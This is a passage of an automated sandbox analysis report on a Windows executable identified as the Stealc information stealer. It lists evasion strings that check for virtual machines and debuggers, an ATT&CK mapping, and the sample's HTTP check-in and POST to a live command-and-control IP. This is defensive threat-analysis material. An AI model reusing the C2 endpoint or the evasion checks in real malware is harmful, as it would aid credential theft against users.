                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001738B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00174910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00174910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0016DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0016E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0016ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00174570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00174570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0016DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0016BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0016F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00173EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00173EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001616D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00161160 GetSystemInfo,ExitProcess,0_2_00161160
                Source: file.exe, file.exe, 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2156506568.0000000000CF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                Source: file.exe, 00000000.00000002.2156506568.0000000000D24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareq
                Source: file.exe, 00000000.00000002.2156506568.0000000000D24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW*x
                Source: file.exe, 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13589
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13586
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13608
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13600
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13640
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001645C0 VirtualProtect ?,00000004,00000100,000000000_2_001645C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00179860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00179860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00179750 mov eax, dword ptr fs:[00000030h]0_2_00179750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00177850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00177850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1824, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00179600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00179600
                Source: file.exe, file.exe, 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00177B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00176920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00176920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00177850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00177850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00177A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00177A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.160000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2111080022.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1824, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.160000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2111080022.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1824, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe47%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37RDfile.exe, 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php=hfile.exe, 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.php%hhfile.exe, 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpftfile.exe, 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.37
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1529037
                        Start date and time:2024-10-08 15:41:21 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 49s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:7
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 81%
                        • Number of executed functions: 20
                        • Number of non-executed functions: 82
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.9486820090938775
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'836'544 bytes
                        MD5:9d007dc0dc48fd402f13f65547d002f3
                        SHA1:487a3e42ebc95babcc96a71388fd35577290302d
                        SHA256:6bc02402cb6ca77ef60e9e04ed1996840e9eb6088a0b9f748653d63f915edb0a
                        SHA512:265518065ac2249fe901d732921309c77e038da613ea5b3375a815e726ff2fd645b2d6c15d90f5d5dcdbeda07137e0717c68fddf1421941f72733b08a6e7f0fb
                        SSDEEP:49152:x4j7Euaf4lkIKCj1vkIDSoJU5uYYHBHtdM:ZuCdC59ouj3
                        TLSH:5D8533334CA169C2C9B19ABB3A5231D87C44B48E01B17EB57FB5A02CD6437D4763A7B8
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0xa97000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007F3F247B2FDAh
                        pmulhuw mm3, qword ptr [ebx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [esi], al
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dl
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [esi], al
                        or al, byte ptr [eax]
                        add byte ptr [ecx], al
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [edi], al
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        pop es
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x25b0000x22800447946d7970a678b25cf4c915fa3caf9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x25e0000x29d0000x20053f1b6562bba607c70129fb73393c7fbunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        iovqbmaf0x4fb0000x19b0000x19a400a09c56ad4e6fcf5736ad1417bd9f64d9False0.9948017834018891data7.9538207256362705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        tgzswadw0x6960000x10000x4001c8e7c49498cc5e85143d91f9c4ee53eFalse0.763671875data6.064656695273445IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x6970000x30000x2200e1d8eb5969ea152bbfdfcd8224b025f5False0.061810661764705885DOS executable (COM)0.7212457865960206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Imports

                        DLLImport
                        kernel32.dlllstrcpy

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-08T15:42:15.749488+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649710185.215.113.3780TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 8, 2024 15:42:14.810719967 CEST4971080192.168.2.6185.215.113.37
                        Oct 8, 2024 15:42:14.815921068 CEST8049710185.215.113.37192.168.2.6
                        Oct 8, 2024 15:42:14.816005945 CEST4971080192.168.2.6185.215.113.37
                        Oct 8, 2024 15:42:14.819689989 CEST4971080192.168.2.6185.215.113.37
                        Oct 8, 2024 15:42:14.824657917 CEST8049710185.215.113.37192.168.2.6
                        Oct 8, 2024 15:42:15.504110098 CEST8049710185.215.113.37192.168.2.6
                        Oct 8, 2024 15:42:15.504216909 CEST4971080192.168.2.6185.215.113.37
                        Oct 8, 2024 15:42:15.520028114 CEST4971080192.168.2.6185.215.113.37
                        Oct 8, 2024 15:42:15.524876118 CEST8049710185.215.113.37192.168.2.6
                        Oct 8, 2024 15:42:15.749420881 CEST8049710185.215.113.37192.168.2.6
                        Oct 8, 2024 15:42:15.749488115 CEST4971080192.168.2.6185.215.113.37
                        Oct 8, 2024 15:42:17.989805937 CEST4971080192.168.2.6185.215.113.37

                        HTTP Request Dependency Graph

                        • 185.215.113.37

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.649710185.215.113.37801824C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Oct 8, 2024 15:42:14.819689989 CEST89OUTGET / HTTP/1.1
                        Host: 185.215.113.37
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Oct 8, 2024 15:42:15.504110098 CEST203INHTTP/1.1 200 OK
                        Date: Tue, 08 Oct 2024 13:42:15 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Oct 8, 2024 15:42:15.520028114 CEST411OUTPOST /e2b1563c6670f193.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHI
                        Host: 185.215.113.37
                        Content-Length: 210
                        Connection: Keep-Alive
                        Cache-Control: no-cache
